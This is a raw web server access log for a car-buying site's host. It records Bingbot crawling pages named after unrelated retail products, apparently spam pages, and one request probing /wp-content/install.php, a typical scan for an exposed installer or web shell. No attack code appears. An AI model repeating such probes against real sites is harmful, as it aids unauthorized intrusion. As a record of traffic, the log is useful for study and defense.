cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.215 - - [13/Jun/2025:08:04:34 +0000] "GET /Leech%20Lake%20Minnesota%20Fishing%20Hot%20Spots%20Waterproof%20Tearproof%20Map%201994%20Edition%20%20-%20UVJGXF5eQlVQQ0Ba/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.200 - - [13/Jun/2025:08:04:55 +0000] "GET /9pcs%20Car%20Keyless%20Entry%20Engine%20Start%20Alarm%20System%20Push%20Button%20Remote%20Starter%20Stop%20-%20UVNGWlJfQFtTQkpU/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.215 - - [13/Jun/2025:08:05:02 +0000] "GET /A%20Topical%20Approach%20to%20Lifespan%20Development%20Hardcover%20John%20W.%20Sant%20-%20UVNFWl5aSlpURUFQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 69.197.135.226 - - [13/Jun/2025:08:06:28 +0000] "GET /wp-content/install.php HTTP/1.1" 200 16 "https://cashforcarscarrollton.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.215 - - [13/Jun/2025:08:07:22 +0000] "GET /GNC%20Total%20Lean%20Burn%2060%20Cinnamon-Flavored%20Tablets%20EXP:%209/2026%20-%20UFFGUFNcQlVYRkNX/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.215 - - [13/Jun/2025:08:08:08 +0000] "GET /Calvin%20Klein%20Jeans%20%20CKJ20515%20Eyeglasses%20SOFT%20TORTOISE%20/%20Clear%20demo%20lens%20-%20UFBGUFZWR1pURkNW/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
